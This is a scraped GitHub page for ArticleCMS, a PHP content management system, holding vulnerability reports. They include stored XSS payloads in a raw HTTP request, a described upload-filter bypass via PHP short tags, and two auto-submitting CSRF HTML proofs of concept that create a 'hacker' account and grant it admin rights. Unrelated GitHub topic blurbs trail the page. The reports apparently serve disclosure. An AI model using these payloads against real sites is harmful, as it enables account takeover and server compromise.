woider / articlecms Goto Github PK
View Code? Open in Web Editor NEW基于 Bootstrap 3.2 和 ThinkPHP 5.0 搭建的响应式资讯网站,侧重于后台用户和文章的管理。
基于 Bootstrap 3.2 和 ThinkPHP 5.0 搭建的响应式资讯网站,侧重于后台用户和文章的管理。
curl 'http://example.com/root_create_user' -H 'Pragma: no-cache' -H 'Origin: http://example.com' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: zh-CN,zh;q=0.8' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Referer: http://example.com/admin' --data 'username=test233&password=test&realname=test&email=test233%40test.com' --compressed
Place in modify the name and email insert test code will be executed after landing page
POC:
`
- POST /update_personal_infomation HTTP/1.1
- Host: 127.0.0.1
- User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
- Accept: */*
- Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
- Accept-Encoding: gzip, deflate
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- X-Requested-With: XMLHttpRequest
- Referer: http://172.16.125.115/admin
- Content-Length: 80
- Cookie: PHPSESSID=ch6ursnieofju1mqn02n02ri64
- Connection: close
-
- realname="><img src=xss onerror=alert(1)>&email="><img src=xss onerror=alert(1)>
location:
<div class="modal-body">
<form class="form-horizontal">
<div class="form-group">
<label for="realname" class="col-sm-2 control-label">姓名</label>
<div class="col-sm-10">
<input type="text" class="form-control" id="realname"
value=""><img src=xss onerror=alert(1)>"/>
</div>
</div>
<div class="form-group">
<label for="email" class="col-sm-2 control-label">邮箱</label>
<div class="col-sm-10">
<input type="email" class="form-control" id="email"
value=""><img src=xss onerror=alert(1)>"/>
</div>
</div>
`
there is a File upload attack vulnerability,It can lead to arbitrary uploading of PHP script files.
The location of the vulnerability is in http://ip/public/admin,where the content editing function is.
Let's see the code:
There are two problems:
In addition, although the CMS detects and filters uploaded files, it will be automatically commented out if it matches <?php .
such as:
but We can bypass with short tags,such as:
My exploit is as follows:
Let's test it out.
as we can see,The PHP Trojan has been successfully uploaded and validated.
1
When the super administrator (root) logged in, there are 2 important POST methods without CSRF protection, can create a new user and promote it to administrator privileges. This can be achieved by cheating the super administrator to open the 2 pages when he logged in.
<!--poc1.html(Create a new user)-->
<!DOCTYPE html>
<html>
<head>
<title> CSRF Proof Of Concept - Create a new user</title>
<script type="text/javascript">
function exec1(){
document.getElementById('form1').submit();
}
</script>
</head>
<body onload="exec1();">
<form id="form1" action="http://localhost/root_create_user" method="POST">
<input type="hidden" name="username" value="hacker" />
<input type="hidden" name="password" value="hacker" />
<input type="hidden" name="realname" value="hacker" />
<input type="hidden" name="email" value="" />
</form>
</body>
</html>
<!--poc2.html(Promote a user to Administrator privileges)-->
<!DOCTYPE html>
<html>
<head>
<title> CSRF Proof Of Concept - update a user to admin</title>
<script type="text/javascript">
function exec1(){
document.getElementById('form1').submit();
}
</script>
</head>
<body onload="exec1();">
<form id="form1" action="http://localhost/update_admin_info" method="POST">
<input type="hidden" name="id" value="7" />
<input type="hidden" name="check" value="false" />
</form>
</body>
</html>
There is Two Cross-Site Request Forgery (CSRF) vulnerabilities in ArticleCMS allow attackers to create users and escalate privileges.
When the super administrator (root) logged in, there are 2 important POST methods without CSRF protection, can create a new user and promote it to administrator privileges. This can be achieved by cheating the super administrator to open the 2 pages when he logged in.
Set up the cms on the public network server and log in to the root user to obtain a request package for creating a user.
burp intercepts the request and creates the csrf poc.
At this point in another browser, assuming that the root user logged in to the CMS and left a login information in a browser, and then click the send others CSRF link:
http://192.168.1.26/SAFE16/articlecms_csrf.html
View the user management page,The ‘hacker’ user is added successfully.
In this set of cms, the duties are divided into administrator, auditor and editor from top to bottom.Promotion requires the root user to click this button.
This is also a csrf attack similar to the operation of creating users above.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.